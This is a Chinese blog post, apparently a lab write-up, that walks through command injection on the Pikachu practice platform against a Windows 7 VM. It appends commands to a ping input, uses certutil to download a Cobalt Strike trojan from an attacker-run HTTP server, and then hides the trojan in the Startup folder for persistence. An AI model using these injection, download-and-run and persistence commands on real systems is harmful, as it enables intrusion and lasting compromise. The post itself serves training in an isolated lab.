Pikachu漏洞测试平台之命令执行
  Il1dbC9Jhbvl 2023年11月13日 35 0

实验环境:

  • 靶机:win7虚拟机
  • 服务端:kali虚拟机
  • 客户端:win10

使用ping命令观察回显

Pikachu漏洞测试平台之命令执行_Linux

在IP后拼接其他命令测试,通过whoami可以看出当前系统为windows且登录用户为administrator

Pikachu漏洞测试平台之命令执行_CS_02

使用dir查看当前目录下的文件

Pikachu漏洞测试平台之命令执行_Linux_03

二、生成木马程序

使用CS生成木马程序,上传至靶机内进行持久连接

在kali中运行服务端

Pikachu漏洞测试平台之命令执行_Linux_04

添加一个监听器

Pikachu漏洞测试平台之命令执行_Pikachu_05

生成木马,选中刚才添加的监听器

Pikachu漏洞测试平台之命令执行_网络安全_06

Pikachu漏洞测试平台之命令执行_CS_07

在当前目录使用python开启一个http服务

python -m http.server 9090

Pikachu漏洞测试平台之命令执行_CS_08

三、上传木马程序

127.0.0.1 & certutil.exe -urlcache -split -f http://192.168.10.5:9090/666.exe 12.exe

Pikachu漏洞测试平台之命令执行_Pikachu_09

查看程序是否上传成

127.0.0.1 & dir

Pikachu漏洞测试平台之命令执行_Linux_10

在当前系统中运行该木马程序

Pikachu漏洞测试平台之命令执行_Pikachu_11

查看cs中是否上线主机

Pikachu漏洞测试平台之命令执行_Linux_12

Pikachu漏洞测试平台之命令执行_CS_13

查看当前主机网络信息和文件信息

Pikachu漏洞测试平台之命令执行_Pikachu_14


Pikachu漏洞测试平台之命令执行_Pikachu_15

  • 使用dir获取当前目录的绝对路径

Pikachu漏洞测试平台之命令执行_网络安全_16

添加为开机自启动,并为程序添加隐藏属性

  • 找到当前开机自启目录

Pikachu漏洞测试平台之命令执行_网络安全_17

  • 复制路径,使用cs将木马程序复制到自启目录内,这样就完成了持久化连接
#复制文件
beacon> shell copy 12.exe "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
#添加隐藏属性
beacon> shell attrib +h "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12.exe"

Pikachu漏洞测试平台之命令执行_Linux_18

靶机内查看开机自启目录,显示无文件

Pikachu漏洞测试平台之命令执行_Linux_19

重启靶机后再次查看

Pikachu漏洞测试平台之命令执行_Pikachu_20

【版权声明】本文内容来自摩杜云社区用户原创、第三方投稿、转载,内容版权归原作者所有。本网站的目的在于传递更多信息,不拥有版权,亦不承担相应法律责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@moduyun.com

  1. 分享:
最后一次编辑于 2023年11月13日 0

暂无评论

推荐阅读
  5NWiQFAVeqgX   2024年05月17日   31   0   0 网络安全
  pTtIhLb24H2d   2024年05月17日   34   0   0 网络安全
  OKgNPeBk991j   2024年05月18日   47   0   0 网络安全
  rKgO6TN7xbYO   2024年05月17日   37   0   0 网络安全
  5NWiQFAVeqgX   2024年05月17日   50   0   0 网络安全
  5NWiQFAVeqgX   2024年05月17日   35   0   0 网络安全
  YOkriIV1Am1d   2024年05月20日   39   0   0 网络安全
  owpmXY9hzjPv   2024年05月20日   36   0   0 网络安全
  owpmXY9hzjPv   2024年05月20日   37   0   0 网络安全
  owpmXY9hzjPv   2024年05月20日   34   0   0 网络安全
Il1dbC9Jhbvl